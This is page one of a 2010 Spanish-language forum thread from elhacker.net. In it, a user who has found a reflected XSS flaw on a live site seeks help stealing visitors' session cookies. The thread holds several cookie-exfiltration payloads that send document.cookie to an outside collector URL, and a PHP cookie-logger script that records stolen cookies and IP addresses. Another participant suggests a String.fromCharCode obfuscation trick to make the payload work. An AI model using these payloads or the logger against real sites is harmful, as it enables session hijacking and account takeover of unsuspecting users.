elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 03:57  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  XSS Help!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: XSS Help!!!  (Leído 3,009 veces)
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
XSS Help!!!
« en: 10 Febrero 2010, 17:15 »

Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!
En línea
tragantras


Desconectado Desconectado

Mensajes: 466


Ver Perfil
Re: XSS Help!!!
« Respuesta #1 en: 10 Febrero 2010, 17:20 »

esto va en nivel web... XD
prueba con document.location en lugar de window.location


pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/


un saludo!
En línea

Colaboraciones:
1 2
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #2 en: 10 Febrero 2010, 17:27 »

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="http://mysite.us/c.php?cookie="+ document.cookie;</script>

ya tambien lo e tratado y nada.
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: XSS Help!!!
« Respuesta #3 en: 10 Febrero 2010, 19:06 »

En el primer codigo, no te funko porque pusiste
Código:
"><scritp>....
y es
Código:
"><script>....
xD, ahora en el segundo codigo, intentad ponerlo bajo comillas simples y no dobles
En línea

---
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #4 en: 10 Febrero 2010, 19:12 »

Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.
« Última modificación: 10 Febrero 2010, 19:22 por [{O_o}] » En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: XSS Help!!!
« Respuesta #5 en: 10 Febrero 2010, 21:24 »

que raro  :-\, nose, proba con self.location
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #6 en: 10 Febrero 2010, 21:47 »

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #7 en: 10 Febrero 2010, 22:09 »

Haber, muestra lo siguiente:

El codigo php para guardar el archivo de texto con las cookie.
Muestra los permiso del archivo php y los permiso de la carpeta donde esta este.
Muestra una captura aver si el XSS funciona correctamente.
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #8 en: 10 Febrero 2010, 22:25 »

Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.

Primero vamos encodear el codigo javascript a ASCII , que sera este:
Código:
<script>window.location="http://www.google.com";</script>
Ahora sera:
Código:
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62

Entonce la XSS quedara asi
Código:
"><script>document.write(String.fromCharCode(
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>

Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII:
Herramienta

Saludos espero que funcione.
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #9 en: 10 Febrero 2010, 22:38 »

Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.
En línea
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #10 en: 10 Febrero 2010, 22:49 »

chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!

« Última modificación: 10 Febrero 2010, 23:01 por [{O_o}] » En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #11 en: 10 Febrero 2010, 22:59 »

Tio hacerlo con el String.fromCharCode() y veras que funcionara y cuentas.
En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: XSS Help!!!
« Respuesta #12 en: 10 Febrero 2010, 23:00 »

no creo q te convenga poner la url original.. :S cambiala por **** ;)
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #13 en: 10 Febrero 2010, 23:02 »

Solo la puse asi para que ustedes trataran!!!
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #14 en: 10 Febrero 2010, 23:05 »

Tranquilo man, anda y usa String.fromCharCode(), aveces es mejor que pongas la url.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines